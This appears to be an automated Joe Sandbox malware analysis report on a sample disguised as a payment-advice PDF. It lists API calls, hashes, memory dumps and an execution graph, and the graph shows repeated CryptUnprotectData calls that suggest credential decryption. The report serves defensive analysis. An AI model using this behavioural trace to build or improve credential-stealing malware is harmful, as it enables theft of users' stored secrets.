                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                • API String ID: 2709904686-224404859
                                                                                                                • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                                • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1780285237-0
                                                                                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 190613189-0
                                                                                                                • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:2.7%
                                                                                                                Total number of Nodes:222
                                                                                                                Total number of Limit Nodes:15
                                                                                                                execution_graph 41797 37fbe708 DispatchMessageW 41798 37fbe774 41797->41798 41602 37a8ce60 41603 37a8ce7c 41602->41603 41606 37a894b4 41603->41606 41605 37a8ce9b 41607 37a894bf 41606->41607 41608 37a8cf4f 41607->41608 41611 37a8cf68 41607->41611 41615 37a8cf59 41607->41615 41608->41605 41612 37a8cf7f 41611->41612 41613 37a8d021 41612->41613 41619 37a895e8 41612->41619 41613->41613 41617 37a8cf67 41615->41617 41616 37a8d021 41617->41616 41618 37a895e8 2 API calls 41617->41618 41618->41616 41620 37a895f3 41619->41620 41622 37a8ec47 41620->41622 41623 37a8e7f4 41620->41623 41622->41613 41624 37a8e7ff 41623->41624 41625 37a8f111 41624->41625 41628 37a8fab0 41624->41628 41632 37a8faa1 41624->41632 41625->41622 41629 37a8fadb 41628->41629 41630 37a8fb8a 41629->41630 41636 37fb00c0 41629->41636 41634 37a8fab0 41632->41634 41633 37a8fb8a 41633->41633 41634->41633 41635 37fb00c0 2 API calls 41634->41635 41635->41633 41640 37fb0110 41636->41640 41644 37fb0104 41636->41644 41641 37fb0178 CreateWindowExW 41640->41641 41643 37fb0234 41641->41643 41643->41643 41645 37fb0110 CreateWindowExW 41644->41645 41647 37fb0234 41645->41647 41647->41647 41799 ad030 41800 ad048 41799->41800 41801 ad0a2 41800->41801 41807 37fb02c8 41800->41807 41812 37fb02b7 41800->41812 41817 37fb03f0 41800->41817 41820 37fb1bc0 41800->41820 41826 37fb1bd0 41800->41826 41808 37fb02ee 41807->41808 41810 37fb1bd0 2 API calls 41808->41810 41811 37fb1bc0 2 API calls 41808->41811 41809 37fb030f 41809->41801 41810->41809 41811->41809 41813 37fb02c8 41812->41813 41815 37fb1bd0 2 API calls 41813->41815 41816 37fb1bc0 2 API calls 41813->41816 41814 37fb030f 41814->41801 41815->41814 41816->41814 41818 37fb0407 41817->41818 41832 37fb0841 41817->41832 41818->41801 41821 37fb1bd0 41820->41821 41822 37fb1c2f 41821->41822 41835 37fb9b38 41821->41835 41840 37fb9b48 41821->41840 41845 37fb1d58 41821->41845 41827 37fb1bfd 41826->41827 41828 37fb1c2f 41827->41828 41829 37fb9b48 CallWindowProcW 41827->41829 41830 37fb9b38 CallWindowProcW 41827->41830 41831 37fb1d58 2 API calls 41827->41831 41829->41828 41830->41828 41831->41828 41833 37fb0856 41832->41833 41834 37fb0938 6 API calls 41832->41834 41833->41818 41834->41833 41837 37fb9b48 41835->41837 41836 37fb9be8 41836->41822 41854 37fb9bef 41837->41854 41858 37fb9c00 41837->41858 41841 37fb9b5c 41840->41841 41843 37fb9bef CallWindowProcW 41841->41843 41844 37fb9c00 CallWindowProcW 41841->41844 41842 37fb9be8 41842->41822 41843->41842 41844->41842 41846 37fb1d93 41845->41846 41847 37fb1d66 41845->41847 41846->41847 41849 37fb1d98 41846->41849 41848 37fb1d6e 41847->41848 41853 37fb1dc0 CallWindowProcW 41847->41853 41848->41822 41868 37fb17d0 41849->41868 41851 37fb1da4 41851->41822 41852 37fb1dac 41852->41822 41853->41852 41855 37fb9c00 41854->41855 41856 37fb9c11 41855->41856 41861 37fbb050 41855->41861 41856->41836 41859 37fb9c11 41858->41859 41860 37fbb050 CallWindowProcW 41858->41860 41859->41836 41860->41859 41864 37fb1dc0 41861->41864 41865 37fb1e02 41864->41865 41867 37fb1e09 41864->41867 41866 37fb1e5a CallWindowProcW 41865->41866 41865->41867 41866->41867 41867->41856 41869 37fb17db 41868->41869 41872 37fb181c 41869->41872 41871 37fb22f5 41871->41851 41873 37fb1827 41872->41873 41874 37fb2461 GetCurrentThreadId 41873->41874 41875 37fb248b 41873->41875 41874->41875 41875->41871 41876 37fb20c0 41879 37fb20ed 41876->41879 41877 37fb213c 41877->41877 41879->41877 41880 37fb17fc 41879->41880 41881 37fb1807 41880->41881 41882 37fb17d0 GetCurrentThreadId 41881->41882 41883 37fb229c 41882->41883 41885 37a895e8 2 API calls 41883->41885 41884 37fb22a5 41884->41877 41885->41884 41886 37fb2020 SetTimer 41887 37fb208c 41886->41887 41648 15b158 41654 15b174 41648->41654 41649 15b1a3 41665 37fb2730 41649->41665 41655 374e0188 41654->41655 41660 374e0198 41654->41660 41656 374e01a4 41655->41656 41671 374ec638 41656->41671 41675 374ec649 41656->41675 41657 374e01da 41657->41649 41661 374e01a4 41660->41661 41662 374ec638 CryptUnprotectData 41661->41662 41663 374ec649 CryptUnprotectData 41661->41663 41664 374e01da 41662->41664 41663->41664 41664->41649 41666 37fb273f 41665->41666 41707 37fb0938 41666->41707 41673 374ec631 41671->41673 41672 374ecaf9 41672->41657 41673->41671 41673->41672 41679 374ecf01 41673->41679 41677 374ec66a 41675->41677 41676 374ecaf9 41676->41657 41677->41676 41678 374ecf01 CryptUnprotectData 41677->41678 41678->41677 41680 374ecf10 41679->41680 41684 374ed540 41680->41684 41692 374ed550 41680->41692 41681 374ecf80 41681->41673 41685 374ed550 41684->41685 41686 374ed629 41685->41686 41690 374ed540 CryptUnprotectData 41685->41690 41691 374ed550 CryptUnprotectData 41685->41691 41700 374ed730 41685->41700 41704 374ed1ec 41686->41704 41690->41686 41691->41686 41693 374ed575 41692->41693 41696 374ed629 41692->41696 41693->41696 41697 374ed730 CryptUnprotectData 41693->41697 41698 374ed540 CryptUnprotectData 41693->41698 41699 374ed550 CryptUnprotectData 41693->41699 41694 374ed1ec CryptUnprotectData 41695 374ed7f5 41694->41695 41695->41681 41696->41694 41697->41696 41698->41696 41699->41696 41701 374ed739 41700->41701 41702 374ed1ec CryptUnprotectData 41701->41702 41703 374ed7f5 41702->41703 41703->41686 41705 374ed9e0 CryptUnprotectData 41704->41705 41706 374ed7f5 41705->41706 41706->41681 41708 37fb0948 41707->41708 41709 37fb0965 41708->41709 41715 37fb0980 41708->41715 41711 37fb188c 41709->41711 41713 37fb1897 41711->41713 41714 37fb2866 41713->41714 41738 37fb1934 41713->41738 41716 37fb09c6 GetCurrentProcess 41715->41716 41718 37fb0a18 GetCurrentThread 41716->41718 41719 37fb0a11 41716->41719 41720 37fb0a4e 41718->41720 41721 37fb0a55 GetCurrentProcess 41718->41721 41719->41718 41720->41721 41722 37fb0a8b 41721->41722 41727 37fb0b4f 41722->41727 41731 37fb0f31 41722->41731 41723 37fb0ab3 GetCurrentThreadId 41724 37fb0ae4 41723->41724 41724->41709 41733 37fb0bc8 DuplicateHandle 41727->41733 41735 37fb0bc0 41727->41735 41728 37fb0b8e 41728->41723 41732 37fb0f3a 41731->41732 41732->41723 41734 37fb0c5e 41733->41734 41734->41728 41736 37fb0bc8 DuplicateHandle 41735->41736 41737 37fb0c5e 41736->41737 41737->41728 41744 37fb193f 41738->41744 41739 37fb2e79 41740 37fb2ea9 41739->41740 41741 37fb2ac4 7 API calls 41739->41741 41745 37fb2ed4 41740->41745 41752 37fb2ac4 41740->41752 41741->41740 41743 37fb2ec1 41743->41745 41758 37fbd66f 41743->41758 41744->41739 41744->41745 41748 37fb3e40 41744->41748 41745->41713 41749 37fb3e61 41748->41749 41750 37fb3e85 41749->41750 41764 37fb3ff0 41749->41764 41750->41739 41753 37fb2acf 41752->41753 41754 37fb0938 6 API calls 41753->41754 41757 37fbd0a1 41753->41757 41755 37fbd0bb 41754->41755 41790 37fbc544 41755->41790 41757->41743 41763 37fbd672 41758->41763 41759 37fbd899 41760 37fb0938 6 API calls 41759->41760 41762 37fbd6ba 41760->41762 41761 37fbdad0 WaitMessage 41761->41763 41762->41745 41763->41759 41763->41761 41763->41762 41766 37fb3ffd 41764->41766 41765 37fb0938 6 API calls 41767 37fb402b 41765->41767 41766->41765 41768 37fb4036 41767->41768 41770 37fb2bec 41767->41770 41768->41750 41771 37fb2bf7 41770->41771 41772 37fb40a8 41771->41772 41774 37fb2c20 41771->41774 41775 37fb2c2b 41774->41775 41780 37fb2c30 41775->41780 41777 37fb4517 41784 37fb921c 41777->41784 41783 37fb2c3b 41780->41783 41781 37fb57a0 41781->41777 41782 37fb3e40 8 API calls 41782->41781 41783->41781 41783->41782 41785 37fb4551 41784->41785 41786 37fb9235 41784->41786 41785->41772 41788 37a8fab0 2 API calls 41786->41788 41789 37a8faa1 2 API calls 41786->41789 41787 37fb9321 41788->41787 41789->41787 41792 37fbc54f 41790->41792 41791 37fbd3bb 41791->41757 41792->41791 41794 37fbc560 41792->41794 41795 37fbd3f0 OleInitialize 41794->41795 41796 37fbd454 41795->41796 41796->41791

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 229 154328-154368 231 15436f-15444c call 153168 call 152c88 229->231 232 15436a 229->232 242 154453-154471 231->242 243 15444e 231->243 232->231 273 154474 call 154611 242->273 274 154474 call 154620 242->274 243->242 244 15447a-154485 245 154487 244->245 246 15448c-154490 244->246 245->246 247 154495-15449c 246->247 248 154492-154493 246->248 250 1544a3-1544b1 247->250 251 15449e 247->251 249 1544b4-1544f8 248->249 255 15455e-154575 249->255 250->249 251->250 257 154577-15459c 255->257 258 1544fa-154510 255->258 264 1545b4 257->264 265 15459e-1545b3 257->265 262 154512-15451e 258->262 263 15453a 258->263 266 154520-154526 262->266 267 154528-15452e 262->267 268 154540-15455d 263->268 265->264 269 154538 266->269 267->269 268->255 269->268 273->244 274->244
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0oWp$LjWp$LjWp$PHtq$PHtq
                                                                                                                • API String ID: 0-3561621482
                                                                                                                • Opcode ID: 809dcc5d2ef3bea0c77c8dc28364314e4816e4bc778e88067ca695c14a21a200
                                                                                                                • Instruction ID: ea81778b0fd9611fef7d068d0648391d34201573270b5175603d603a5b271ab7
                                                                                                                • Opcode Fuzzy Hash: 809dcc5d2ef3bea0c77c8dc28364314e4816e4bc778e88067ca695c14a21a200
                                                                                                                • Instruction Fuzzy Hash: 0191E774E00258CFDB14DFAAD844A9DBBF2BF89304F14D069E819AB365DB305985CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (otq$4'tq$4'tq$4'tq
                                                                                                                • API String ID: 0-3772766173
                                                                                                                • Opcode ID: 6dfc521168a042fbfd75f0fe687e9d2b5eff6ed94233473ee00fb716355aec49
                                                                                                                • Instruction ID: b2473d0e171c276fa3cdc5781345134f6f11e4442893bab739d443ec4a4d91f6
                                                                                                                • Opcode Fuzzy Hash: 6dfc521168a042fbfd75f0fe687e9d2b5eff6ed94233473ee00fb716355aec49
                                                                                                                • Instruction Fuzzy Hash: 47A26F70A04209DFCB15CF68C994AAEBBB2FF88311F158559E815DF2A1D730ED49CBA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 765 1560e0-156103 766 156105-15610b 765->766 767 15610e-15612e 765->767 766->767 770 156135-15613c 767->770 771 156130 767->771 773 15613e-156149 770->773 772 1564c4-1564cd 771->772 774 1564d5-1564fe 773->774 775 15614f-156162 773->775 778 156164-156172 775->778 779 156178-156193 775->779 778->779 782 15644c-156453 778->782 783 156195-15619b 779->783 784 1561b7-1561ba 779->784 782->772 787 156455-156457 782->787 785 1561a4-1561a7 783->785 786 15619d 783->786 788 156314-15631a 784->788 789 1561c0-1561c3 784->789 791 1561da-1561e0 785->791 792 1561a9-1561ac 785->792 786->785 786->788 790 156406-156409 786->790 786->791 793 156466-15646c 787->793 794 156459-15645e 787->794 788->790 795 156320-156325 788->795 789->788 796 1561c9-1561cf 789->796 801 1564d0 790->801 802 15640f-156415 790->802 803 1561e6-1561e8 791->803 804 1561e2-1561e4 791->804 797 156246-15624c 792->797 798 1561b2 792->798 793->774 799 15646e-156473 793->799 794->793 795->790 796->788 800 1561d5 796->800 797->790 807 156252-156258 797->807 798->790 805 156475-15647a 799->805 806 1564b8-1564bb 799->806 800->790 801->774 808 156417-15641f 802->808 809 15643a-15643e 802->809 810 1561f2-1561fb 803->810 804->810 805->801 812 15647c 805->812 806->801 811 1564bd-1564c2 806->811 813 15625e-156260 807->813 814 15625a-15625c 807->814 808->774 815 156425-156434 808->815 809->782 818 156440-156446 809->818 816 1561fd-156208 810->816 817 15620e-156236 810->817 811->772 811->787 819 156483-156488 812->819 820 15626a-156281 813->820 814->820 815->779 815->809 816->790 816->817 838 15623c-156241 817->838 839 15632a-156360 817->839 818->773 818->782 822 1564aa-1564ac 819->822 823 15648a-15648c 819->823 830 156283-15629c 820->830 831 1562ac-1562d3 820->831 822->801 826 1564ae-1564b1 822->826 827 15648e-156493 823->827 828 15649b-1564a1 823->828 826->806 827->828 828->774 833 1564a3-1564a8 828->833 830->839 842 1562a2-1562a7 830->842 831->801 844 1562d9-1562dc 831->844 833->822 834 15647e-156481 833->834 834->801 834->819 838->839 845 156362-156366 839->845 846 15636d-156375 839->846 842->839 844->801 847 1562e2-15630b 844->847 848 156385-156389 845->848 849 156368-15636b 845->849 846->801 850 15637b-156380 846->850 847->839 862 15630d-156312 847->862 851 1563a8-1563ac 848->851 852 15638b-156391 848->852 849->846 849->848 850->790 854 1563b6-1563d5 call 1566b8 851->854 855 1563ae-1563b4 851->855 852->851 856 156393-15639b 852->856 859 1563db-1563df 854->859 855->854 855->859 856->801 857 1563a1-1563a6 856->857 857->790 859->790 860 1563e1-1563fd 859->860 860->790 862->839
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (otq$(otq$,xq$,xq
                                                                                                                • API String ID: 0-148291897
                                                                                                                • Opcode ID: 6dbfafd6e1781990c9f1a1a5a01a2e8c8be0eda4fe58f4fe22caa0123bd2b52a
                                                                                                                • Instruction ID: 6e2b87dbc95d1e734701dfd920e0dcd1ba66eaeb28ffb07701f2208e73ac6997
                                                                                                                • Opcode Fuzzy Hash: 6dbfafd6e1781990c9f1a1a5a01a2e8c8be0eda4fe58f4fe22caa0123bd2b52a
                                                                                                                • Instruction Fuzzy Hash: AAD15F70A00119DFCB54CFA9C984AADBBB2FF98316F958055E825EF261DB30DD85CB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1429 155968-1559ae 1431 1559b4-1559c2 1429->1431 1432 155f79-155fd4 call 1560e0 1429->1432 1436 1559c4-1559d5 1431->1436 1437 1559f0-155a01 1431->1437 1448 156024-156028 1432->1448 1449 155fd6-155fda 1432->1449 1436->1437 1450 1559d7-1559e3 1436->1450 1438 155a03-155a07 1437->1438 1439 155a72-155a86 1437->1439 1442 155a22-155a2b 1438->1442 1443 155a09-155a15 1438->1443 1573 155a89 call 155f90 1439->1573 1574 155a89 call 155968 1439->1574 1446 155d34 1442->1446 1447 155a31-155a34 1442->1447 1444 155da3-155dee 1443->1444 1445 155a1b-155a1d 1443->1445 1526 155df5-155e74 1444->1526 1452 155d2a-155d31 1445->1452 1458 155d39-155d9c 1446->1458 1447->1446 1453 155a3a-155a59 1447->1453 1456 15603f-156053 1448->1456 1457 15602a-156039 1448->1457 1454 155fdc-155fe1 1449->1454 1455 155fe9-155ff0 1449->1455 1450->1458 1459 1559e9-1559eb 1450->1459 1451 155a8f-155a95 1460 155a97-155a99 1451->1460 1461 155a9e-155aa5 1451->1461 1453->1446 1492 155a5f-155a65 1453->1492 1454->1455 1465 1560c6-1560de 1455->1465 1466 155ff6-155ffd 1455->1466 1467 15605b-156062 1456->1467 1575 156055 call 158d90 1456->1575 1576 156055 call 158da0 1456->1576 1577 156055 call 1590a8 1456->1577 1463 156065-15606f 1457->1463 1464 15603b-15603d 1457->1464 1458->1444 1459->1452 1460->1452 1468 155b93-155ba4 1461->1468 1469 155aab-155ac2 1461->1469 1473 156071-156077 1463->1473 1474 156079-15607d 1463->1474 1464->1467 1466->1448 1472 155fff-156003 1466->1472 1486 155ba6-155bb3 1468->1486 1487 155bce-155bd4 1468->1487 1469->1468 1483 155ac8-155ad4 1469->1483 1478 156005-15600a 1472->1478 1479 156012-156019 1472->1479 1480 156085-1560bf 1473->1480 1474->1480 1482 15607f 1474->1482 1478->1479 1479->1465 1488 15601f-156022 1479->1488 1480->1465 1482->1480 1490 155b8c-155b8e 1483->1490 1491 155ada-155b46 1483->1491 1495 155bef-155bf5 1486->1495 1506 155bb5-155bc1 1486->1506 1494 155bd6-155be2 1487->1494 1487->1495 1488->1467 1490->1452 1531 155b74-155b89 1491->1531 1532 155b48-155b72 1491->1532 1492->1432 1499 155a6b-155a6f 1492->1499 1501 155be8-155bea 1494->1501 1502 155e8b-155eee 1494->1502 1496 155d27 1495->1496 1497 155bfb-155c18 1495->1497 1496->1452 1497->1446 1520 155c1e-155c21 1497->1520 1499->1439 1501->1452 1554 155ef5-155f74 1502->1554 1510 155bc7-155bc9 1506->1510 1511 155e79-155e84 1506->1511 1510->1452 1511->1502 1520->1432 1523 155c27-155c4d 1520->1523 1523->1496 1536 155c53-155c5f 1523->1536 1531->1490 1532->1531 1539 155c65-155cdd 1536->1539 1540 155d23-155d25 1536->1540 1555 155cdf-155d09 1539->1555 1556 155d0b-155d20 1539->1556 1540->1452 1555->1556 1556->1540 1573->1451 1574->1451 1575->1467 1576->1467 1577->1467
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (otq$Hxq
                                                                                                                • API String ID: 0-2156906255
                                                                                                                • Opcode ID: f7d9dce859a264e7fc66e64f876359241d76e1fac1e59e9d49519785f173ae2e
                                                                                                                • Instruction ID: edeb8eb705110482f89fced7c0d3e309baa99f5597955996cefd4f73afef0e9b
                                                                                                                • Opcode Fuzzy Hash: f7d9dce859a264e7fc66e64f876359241d76e1fac1e59e9d49519785f173ae2e
                                                                                                                • Instruction Fuzzy Hash: B1128D70A00619DFDB14DFA9C854AAEBBB7FF88301F208529E915DB3A1DB309D45CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Tetq
                                                                                                                • API String ID: 0-1197912954
                                                                                                                • Opcode ID: 4fb928407aab540702c8479cb8826c4a022fb9f6d7e0f5b9533b662a3af85172
                                                                                                                • Instruction ID: bfdc92f528b51c37fc5a3e1498f273f5f2ccf106369bcf3e9e22d3db9b7af3cb
                                                                                                                • Opcode Fuzzy Hash: 4fb928407aab540702c8479cb8826c4a022fb9f6d7e0f5b9533b662a3af85172
                                                                                                                • Instruction Fuzzy Hash: 5182D3B4A10268CFDB65DF65C894B9DBBB2FB89305F5080E9D909A7354CB319E82CF40
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Tetq
                                                                                                                • API String ID: 0-1197912954
                                                                                                                • Opcode ID: 48b0d76afd08331f511801c7e1f28a4b235661711dd405ad9277dfdadb0e1bfc
                                                                                                                • Instruction ID: 0ec60d32ebebfec279ff2f55d0a94f88a5328d4d262a64f045c04b7bd58fe4b9
                                                                                                                • Opcode Fuzzy Hash: 48b0d76afd08331f511801c7e1f28a4b235661711dd405ad9277dfdadb0e1bfc
                                                                                                                • Instruction Fuzzy Hash: BC72D4B4A10268CFDB65DF65D894B9DBBB2FB89305F5080E9D909A7354CB319E82CF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 358b55d5ae62cb851738d12d9c9357c0968b44fd62671cbcde163512c90acda5
                                                                                                                • Instruction ID: 1c08dc8791a413d6599bfe67a86da8cfb673febf9025f8406bbe20cc8d3de879
                                                                                                                • Opcode Fuzzy Hash: 358b55d5ae62cb851738d12d9c9357c0968b44fd62671cbcde163512c90acda5
                                                                                                                • Instruction Fuzzy Hash: 22E18A74A00209DFEF14DFAAC884B9DBBF1BF88314F19C958E404AB261DB74E945CB81
                                                                                                                APIs
                                                                                                                • CryptUnprotectData.CRYPT32(000000A7,?,00000000,?,?,?,?), ref: 374EDA45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID:
                                                                                                                • API String ID: 834300711-0
                                                                                                                • Opcode ID: ae8b65f00acccae723838c95cce3d870423beb1e90695d292f9214baf9bcc8d5
                                                                                                                • Instruction ID: a31e6d15e9b7225e8ab8a47e0c16613b4977b0702730c67a6f421a0703f405b2
                                                                                                                • Opcode Fuzzy Hash: ae8b65f00acccae723838c95cce3d870423beb1e90695d292f9214baf9bcc8d5
                                                                                                                • Instruction Fuzzy Hash: 81114C76800249DFDB10CF99C944BEEBFF5EF48320F148419E654A7611C379A550DFA5
                                                                                                                APIs
                                                                                                                • CryptUnprotectData.CRYPT32(000000A7,?,00000000,?,?,?,?), ref: 374EDA45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID:
                                                                                                                • API String ID: 834300711-0
                                                                                                                • Opcode ID: 2230a0cf7f89e30a7c4a9e71541f8c43fe279aa626ac313e42b4ec1d06e571ec
                                                                                                                • Instruction ID: 1afe558046907022d478b61b420fc0c3715d826c294813746e5c7b7204e97f14
                                                                                                                • Opcode Fuzzy Hash: 2230a0cf7f89e30a7c4a9e71541f8c43fe279aa626ac313e42b4ec1d06e571ec
                                                                                                                • Instruction Fuzzy Hash: FC1129B6800249EFDB10CF99C845BEEBFF4EF48320F148419E918A7611C379A950DFA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
